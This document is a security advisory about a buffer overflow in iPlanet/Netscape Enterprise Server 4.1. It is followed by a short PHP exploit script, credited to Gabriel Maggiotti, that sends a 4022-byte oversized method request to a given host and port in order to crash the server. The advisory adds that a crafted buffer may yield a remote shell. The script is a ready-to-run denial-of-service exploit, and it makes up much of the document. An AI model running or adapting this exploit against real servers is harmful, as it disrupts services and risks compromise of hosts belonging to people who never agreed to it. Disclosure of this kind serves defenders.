source: https://www.securityfocus.com/bid/2732/info

iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance.

By sending a specially crafted request (composed of at least 2000 characters) it is possible to cause a buffer overflow. This could cause the termination of the affected service, requiring a restart and enabling a remote attacker to effect a denial of service attack.

If the submitted buffer is properly structured, it may yield a remote system shell.

Successful exploitation of this vulnerability could lead to a complete compromise of the host.

Note that while only installations of iWS4.1sp3-7 on Windows NT are immediately vulnerable to this attack, all users of iWS4.1sp3-7 are advised to install the NSAPI.

#!/usr/local/bin/php -q
<?
/*
 * Netscape Enterprise Server 4 Method and URI overflow
 *
 * By sending an invalid method or URI request of 4022 bytes Netscape
 * Enterprise Server will
 * stop responding to requests.
 *
 * Written by Gabriel Maggiotti
 */

	if( $argc!=3)
	{
	echo "usagge: $argv[0] <host> <port>\n";
	return 1;
	}


$host=$argv[1];
$port=$argv[2];

	for($i=0;$i<4022;$i++)
		$overflow.="A";

$overflow.=" /index.htm HTTP/1.0\n\n";

$fp = fsockopen ($host, $port , &$errno, &$errstr, 30);
 if (!$fp) {
     echo "Couldn't create connection<br>\n";
 } else {
	fputs ($fp, $overflow);
}
fclose ($fp);

?>